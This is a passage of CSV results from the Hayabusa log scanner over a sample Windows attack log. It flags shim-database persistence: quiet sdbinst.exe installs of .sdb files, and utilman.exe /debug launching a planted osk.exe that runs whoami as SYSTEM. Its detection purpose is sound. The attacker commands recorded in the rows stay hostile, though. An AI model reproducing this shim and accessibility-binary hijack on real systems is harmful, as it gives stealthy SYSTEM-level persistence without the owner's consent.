AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:16.626 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\wbem\unsecapp.exe -Embedding : Path: C:\Windows\System32\wbem\unsecapp.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:17.026 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\UI0Detect.exe : Path: C:\Windows\System32\UI0Detect.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:22.404 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe SYSTEM : Path: C:\Windows\System32\taskhost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:42:00.148 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""taskhost.exe"" : Path: C:\Windows\System32\taskhost.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:42:00.329 +09:00,PC01.example.corp,1,informational,Process Creation,Command: atbroker.exe : Path: C:\Windows\System32\AtBroker.exe : User: EXAMPLE\user01 : Parent Command: 
winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:42:00.419 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\slui.exe"" : Path: C:\Windows\System32\slui.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:42:00.489 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding : Path: C:\Windows\System32\slui.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:42:37.392 +09:00,PC01.example.corp,1,informational,Process Creation,Command: gpscript.exe /Logon : Path: C:\Windows\System32\gpscript.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k GPSvcGroup,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:42:37.432 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\userinit.exe : Path: C:\Windows\System32\userinit.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:42:37.602 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\Explorer.EXE : Path: C:\Windows\explorer.exe : User: EXAMPLE\user01 : Parent Command: 
C:\Windows\system32\userinit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:42:38.654 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /c msg * ""hello from run key"" : Path: C:\Windows\System32\cmd.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:42:38.704 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\PSEXESVC.exe"" : Path: C:\Windows\PSEXESVC.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:42:38.774 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: msg * ""hello from run key"" : Path: C:\Windows\System32\msg.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Windows\System32\cmd.exe"" /c msg * ""hello from run key""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:43:24.560 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Program Files\Windows Media Player\wmpnetwk.exe"" : Path: C:\Program Files\Windows Media Player\wmpnetwk.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:46:04.916 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: 
EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:46:20.518 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" : Path: C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:48:33.439 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:48:33.439 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:48:33.559 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:48:33.860 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:48:33.870 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:48:33.870 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:48:33.920 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:48:36.644 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: 
winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:49:27.787 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:49:27.787 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:49:27.967 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:49:27.988 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:49:28.158 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: 
utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:49:28.158 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:49:28.158 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:49:31.212 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:49:44.792 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:49:44.792 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via 
sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:49:44.972 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:49:44.982 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:49:45.152 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:49:45.162 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:49:45.162 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via 
sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:49:47.245 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:51:05.017 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:52:25.933 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:52:25.933 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:52:26.104 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator 
(32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:52:26.114 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:52:26.274 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:52:26.364 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:52:26.364 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:52:29.138 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: 
winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:52:47.124 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:52:47.124 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:52:47.294 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:52:47.334 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:52:47.474 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: 
utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:52:47.474 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:52:47.474 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:52:50.268 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:56:05.149 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:58:20.994 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Users\user01\Desktop\titi.sdb"" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application 
Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:58:20.994 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:58:28.214 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000000 0000003c : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:58:28.294 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:58:28.304 +09:00,PC01.example.corp,1,informational,Process Creation,Command: winlogon.exe : Path: C:\Windows\System32\winlogon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:58:28.815 
+09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:58:31.860 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:58:35.745 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""c:\osk.exe"" : Path: C:\osk.exe : User: NT AUTHORITY\SYSTEM : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: whoami : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""c:\osk.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,low,Local Accounts 
